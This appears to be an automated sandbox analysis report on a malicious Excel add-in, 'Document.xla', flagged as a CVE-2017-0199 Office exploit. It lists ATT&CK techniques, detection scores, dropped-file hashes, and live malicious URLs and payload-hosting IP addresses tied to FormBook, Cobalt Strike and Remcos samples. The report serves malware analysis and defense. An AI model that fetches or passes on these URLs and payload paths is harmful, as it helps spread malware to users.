Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Application Window Discovery
Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive13
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS2
System Information Discovery
Distributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Document.xla21%ReversingLabsDocument-Office.Exploit.CVE-2017-0199
Document.xla100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\~DFEB6AEB9B87894B3C.TMP100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\~DF6236E196943C9A91.TMP100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2100%Avira URL Cloudmalware
https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
curt.wiz.co.cdn.gocache.net
170.82.174.30
truefalse
    unknown
    curt.wiz.co
    unknown
    unknownfalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&moodfalse
      • Avira URL Cloud: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2Document.xla, ~DFEB6AEB9B87894B3C.TMP.10.dr, ~DFA747C8484CC23C4D.TMP.10.dr, ~DF6236E196943C9A91.TMP.10.drfalse
      • Avira URL Cloud: malware
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      170.82.174.30
      curt.wiz.co.cdn.gocache.netBrazil
      2664443LCLOUDINTERNETSERVICESLTDA-EPPBRfalse
      172.245.123.12
      unknownUnited States
      36352AS-COLOCROSSINGUSfalse
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1576626
      Start date and time:2024-12-17 10:37:50 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 6m 9s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
      Number of analysed new started processes analysed:13
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:Document.xla
      Detection:MAL
      Classification:mal80.expl.winXLA@6/28@1/2
      Cookbook Comments:
      • Found application associated with file extension: .xla
      • Changed system and user locale, location and keyboard layout to French - France
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Active ActiveX Object
      • Active ActiveX Object
      • Active ActiveX Object
      • Active ActiveX Object
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 52.109.8.89, 52.113.194.132, 20.189.173.23, 52.111.229.19, 52.109.0.91, 20.42.73.30, 40.126.29.5
      • Excluded domains from analysis (whitelisted): ecs.office.com, self-events-data.trafficmanager.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, cus-config.officeapps.live.com, s-0005-office.config.skype.com, prod.nexusrules.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, login.live.com, s-0005.s-msedge.net, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, wus-azsc-config.officeapps.live.com, officeclient.microsoft.com, onedscolprdeus18.eastus.cloudapp.azure.com, ecs.office.trafficmanager.net, onedscolprdwus16.westus.cloudapp.azure.com, nexusrules.officeapps.live.com
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtCreateKey calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtReadVirtualMemory calls found.
      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      • VT rate limit hit for: Document.xla
      TimeTypeDescription
      04:40:56API Interceptor1170x Sleep call for process: splwow64.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      170.82.174.30yGktPvplJn.exeGet hashmaliciousPushdoBrowse
      • www.mqs.com.br/
      a5hbkmGD7N.exeGet hashmaliciousPushdoBrowse
      • www.mqs.com.br/
      9oy0DlGMH9.exeGet hashmaliciousFormBookBrowse
      • www.faunapetsstore.com/o12i/?dT=j6ATUBhxx2glQbP0&2dq=yiHtOwR0aZ7KTWOJuT9hXfachgSHyHMGkjU/6QKzyqsTP1NPRASfxqCAR1p/c7wMh9GXgUQg6w==
      file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
      • www.mqs.com.br/
      file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
      • www.mqs.com.br/
      file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
      • www.mqs.com.br/
      172.245.123.12createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
      • 172.245.123.12/233/createdbestthingswithenergylevelgoodforbusinesspuropse.tIF
      seemebestgoodluckthings.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
      • 172.245.123.12/361/TELNERA.txt
      PI-02911202409#.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
      • 172.245.123.12/361/TELNERA.txt
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      curt.wiz.co.cdn.gocache.net#U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
      • 170.82.174.30
      #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
      • 170.82.174.30
      #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
      • 170.82.174.30
      Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
      • 170.82.173.30
      Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
      • 170.82.173.30
      Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
      • 170.82.174.30
      BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
      • 170.82.174.30
      Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
      • 170.82.174.30
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      3LCLOUDINTERNETSERVICESLTDA-EPPBR#U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
      • 170.82.174.30
      #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
      • 170.82.174.30
      #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
      • 170.82.174.30
      Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
      • 170.82.173.30
      Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
      • 170.82.173.30
      Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
      • 170.82.174.30
      BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
      • 170.82.174.30
      Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
      • 170.82.174.30
      AS-COLOCROSSINGUSgreatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htaGet hashmaliciousCobalt Strike, RemcosBrowse
      • 23.95.235.29
      sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
      • 23.95.235.29
      createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
      • 172.245.123.12
      ORDER-24171200967.XLS..jsGet hashmaliciousWSHRat, Caesium Obfuscator, STRRATBrowse
      • 192.3.220.6
      newthingswithgreatupdateiongivenbestthingswithme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
      • 107.173.4.16
      crreatedbestthingswithgreatattitudeneedforthat.htaGet hashmaliciousCobalt Strike, RemcosBrowse
      • 107.173.4.16
      Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
      • 192.3.179.166
      Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
      • 192.3.179.166
      Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
      • 192.3.179.166
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      6271f898ce5be7dd52b0fc260d0662b3V65xPrgEHH.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
      • 170.82.174.30
      #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
      • 170.82.174.30
      #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
      • 170.82.174.30
      Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
      • 170.82.174.30
      Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
      • 170.82.174.30
      BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
      • 170.82.174.30
      Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
      • 170.82.174.30
      Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
      • 170.82.174.30
      No context
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):118
      Entropy (8bit):3.5700810731231707
      Encrypted:false
      SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
      MD5:573220372DA4ED487441611079B623CD
      SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
      SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
      SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
      Malicious:false
      Reputation:high, very likely benign file
      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):12037
      Entropy (8bit):7.866344824093642
      Encrypted:false
      SSDEEP:192:OnDW73PIfgdIKgIDa5fi+yqBY+4W5yWULR3sDtjTX4z9uZxIyF:ODyWgdohK+ybWTULomqTF
      MD5:AE8EC00261868C658BF06EC1BD8E452F
      SHA1:D5E30EBF5D0A44FD02413EF9460A9406536D79A4
      SHA-256:27B4A19BB371B738916C6BE7C51AF5081520A4870371BA897A1350756664B2DD
      SHA-512:61D9F766F8B9480B487F58FBDAF9A014B16AF22AE10E90ECF2F1771BEB47A9C9E8AD2429C1DA73AC111B10DAA7AAE9475A0E383AFE7F009477DF2CDEB59908F3
      Malicious:false
      Reputation:low
      Preview:INSC.>.....Mar222021151921.w.(qP.;..hA......e.......o.*.yt.;I.M......@................R...?..x..TMk.@.~3..g..... c.J..-m....^. .-.K..U=H.ZS..e..y.'......{k..<z.y'3.].n.^....<...k..j&f.;3.OK....i....A...4...A..h.,...A.ft.@.............GOJV...c].vF.mv..y.....]....q.g....^.s...~...7.~.}8..s.K..4.....(.......[.NQ..2....r.^x..u....yO..=.&.....8..C...*=.]z .Xwk`.{..~..A]......7-O.q...v!......8..!....g..<.......H.._...sq.e......M............,.JS......_.K..:...+...8...I.y....(.mu.e.>...#u.!X..%.nO..'4.R'k_......o......|..Q./u....z....q1.X...'.t.^L...g.u_..@....w.......O.\....S..a..xV.Cr..C...:..1.e.s....0R..._|.U..1....).f'.G....!};j].J,,.....Mqz.............................A<U.p.H{x..V.KTQ...=..pt|#.".7.P....`\8c.@.TRz..T+..+.......j)..r./..$Z..h.B...E.E..}.w..&5W..o.s.;..s...c;3cK..E......O..a..!.a0!.#.&T....U>......0.....4orO=........../....!$..j..i...ZS..p....4.4.d.w...g......*.^s...Z..Y....xk.,....c....g...4..'g...,.w....x@1A.{u^bQ.
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):2278
      Entropy (8bit):3.848470242996745
      Encrypted:false
      SSDEEP:48:uiTrlKxsxx9xl9Il8uio0izWn0Y6x+R3mE4Bd1rc:v5YH0uWnBLRei
      MD5:1CA444CCA4CE0AF8DDBABBCAFEFE6017
      SHA1:C8D003B36061ADAA8D66D5A1A842B3495DADE7F8
      SHA-256:658B3385D5A379B2621C363ED8186349114FA6525BF94BF216C661E198220980
      SHA-512:FE2522CE611EB9CABBBF4E5CF29A941A5FAB099C338FCA7B67BBBAC66AE332799B90EDCFEAE6E1AA1F232276AF367DB6BAEC94C30755C2D6980B6C2DEB5A7840
      Malicious:false
      Reputation:low
      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.C.3.B.X.B.Q.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.a.B.s.g.J.7.
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):4542
      Entropy (8bit):3.9971977622201136
      Encrypted:false
      SSDEEP:96:uMYuW2QAnM3qWJ22yJfRcIWC1C1zHBHcdlx1bXxkdmRC:JlwzqWIjJSBYXxkYRC
      MD5:A125A10318515EB3A5FC9CDFF1CD372A
      SHA1:961CBF10B891E85619A4E4E0213944C99500D724
      SHA-256:8B9D35D84DA581940847A03A3A58661B3345DF60B6934F8EF429DA6032C56B95
      SHA-512:BAEA9032C3F5FB7CC74AE92BAD24B125D176351DC7FDCD90EA21192F53E0458B4C23F5606D70C4F841CF4174B89F6BBEA19D087FD09CA39C09118AF3EE081AFE
      Malicious:false
      Reputation:low
      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".0.0.n.k.6.2.d.Q.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.a.B.s.g.J.7.
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):98908
      Entropy (8bit):2.5798846186442286
      Encrypted:false
      SSDEEP:768:nO5dKvTa1DW7ohBK66mzKzBTonbtQbApQKXE:O3RE
      MD5:882FCC0996628D571420E4679F7D579A
      SHA1:9513763E9836F1F7359902C78DB576A6FA5B8F96
      SHA-256:505BDFB88768E465C600E0698937943354AA0EA9B1F68C6707866D9D47D54ECD
      SHA-512:058C3363C5529F3554E5BB82276A76CE7405C45C645EF93ABA01CB2B9EC1186358586578EA933D2FF1F69B8BB9C2E9BDC8DA921E21732083C70B665C91468AAC
      Malicious:false
      Preview:....l...........................B...{... EMF....\...i.......................8...l...T................u.. 0..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):44256
      Entropy (8bit):3.15066292565687
      Encrypted:false
      SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
      MD5:F1EC2E98B0F577B675156B13DCF94105
      SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
      SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
      SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
      Malicious:false
      Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):8084
      Entropy (8bit):2.5551694039574895
      Encrypted:false
      SSDEEP:96:j+RiOO++Z39FAcRwxBdEtzBfCC7Boff8oBJ6ANQ4HJV:jtGNOzBArH
      MD5:721E8AAC81F0A6D4659831CB8194D668
      SHA1:6BE0CEFAEC9F0B1EAD9DE03C8D4679767CF8B549
      SHA-256:E52DF310BB20C42F738A3C8E03ED4110CB795B8A07AE5D4E474EA075564B1622
      SHA-512:24CACEED3153493E34988C35628FAA2C198C9B13AFDD8ABC214EFBA0ACCD0579BADCD5EB0F76F5BDA16D3A279DB4DF4BB218ABD5FFD751C6E62676BD1AAEF2E7
      Malicious:false
      Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):150296
      Entropy (8bit):2.709732609926334
      Encrypted:false
      SSDEEP:1536:ihWNc0e1ENUAI8DHW/97p8/JYbhaEUbNKQTTLmnJG:Q75G
      MD5:5AB0304133B57E5F97307B6D3F26ED65
      SHA1:DB9FD03185A36CDD6E54E16BFE49EABC14F08CB7
      SHA-256:58638E0FD44B8A679C88C6DCC94AAD105CC0A32560F03AC9C28EF85EEF30D7BB
      SHA-512:562955DE3CCB68ED014B5B4CEFDE104B2C5F9D56CA3E5DFAE088CC5D7622A62FF18C8CEF5284D93A346D5B94273C6AA1E766BA4CC22F6EBB46D3B96F915F1DDA
      Malicious:false
      Preview:....l...........................G....U.. EMF.....K..........................8...l...T................u.. 0..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n....................................... ...............p..7......u.h...........R................[}........7............0.................................X.
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):153132
      Entropy (8bit):2.696496752976619
      Encrypted:false
      SSDEEP:1536:amkQT97gXkRMamXUv6INHOqXbk0WYqEkRffmAta83vvQ:5VmfmAtH3vvQ
      MD5:B097E4D63B4D55A3ADC927C3EAE37776
      SHA1:2AC149C7BD67B90A25EB3C67F1C8739054E742FE
      SHA-256:1BC6FA9E32D3399F450ACE6F5E2B2D338715054D9928B21D77424A9E92F8E266
      SHA-512:DFB57C4CF1A202CE71511A5DFB8F020B2B12DEDA52FCDE16867D4821C6D36680E25840707C013C3E5BD1027020B5D15FEDBA02F98434BDE3565E279CB3B73824
      Malicious:false
      Preview:....l...........................G....U.. EMF....,V..........................8...l...T................u.. 0..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................&...........................%...........................6.......#.......&...........................%...........L...d...........".......................!...........
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:Composite Document File V2 Document, Cannot read section info
      Category:dropped
      Size (bytes):1536
      Entropy (8bit):1.1464700112623651
      Encrypted:false
      SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
      MD5:72F5C05B7EA8DD6059BF59F50B22DF33
      SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
      SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
      SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
      Malicious:false
      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):1293620
      Entropy (8bit):4.563127917199792
      Encrypted:false
      SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
      MD5:F71C973B5E362DFD6408D6C009E5643E
      SHA1:24B3CE67B31BFD4791287932206D54C73489424E
      SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
      SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
      Malicious:false
      Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):99388
      Entropy (8bit):2.577340069847254
      Encrypted:false
      SSDEEP:768:hOOkWvzK1DW7ohBb66mQK4BTo/qQbApQKyE:UzyE
      MD5:D28951034D8734EAE9CDDA6F47B8C78A
      SHA1:A66D84E3B1C7FDB0A44B546443F397E80F548894
      SHA-256:BC129FA0E27DECBD5CEE90BB14C282E9DAEB1B57EB3224F3914ECC793C59FD5F
      SHA-512:FFFD014E922C898935C93BC578A9CD0B5DE59A28F27CADEA642359AF476A2D73C03304C1B15B5807AF9FF6AFA21369B6F284A40EE94D15390126E5ECB44B32AB
      Malicious:false
      Preview:....l...........................B...{... EMF....<...........................8...l...T................u.. 0..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):134544
      Entropy (8bit):2.9527588414114754
      Encrypted:false
      SSDEEP:768:P0WYNNkN2HtS1u40TiTKAvGNLnvfKx4t1cEU9W3V/DOEsx:pYN/Ni0TiTKeYjfKx4tCEU9W35psx
      MD5:83F48FDD46D3424E92E24E709EAB5960
      SHA1:6CEE65663B48B56BDFF6756C38C1F4190EAC6E12
      SHA-256:77F4BCE7FBE1E2F98A04DC51994467460B255135535CDE954EEE8180F500C6AE
      SHA-512:8F781049001FC063EDB9B4352C0EA05D8DA9DCFC599234A58258C6FB4C4CED2B862A701081F10B68E286124413AD04F4AAAB485D376B0A2FB04167AFF121F47E
      Malicious:false
      Preview:....l...............e............n...=.. EMF........6.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f...R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n........................................................@...............8/....X.....8/........................X...................N.8/@....y8/.....m8/|...............|.....................8/.................8/
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):8184
      Entropy (8bit):2.362432014101916
      Encrypted:false
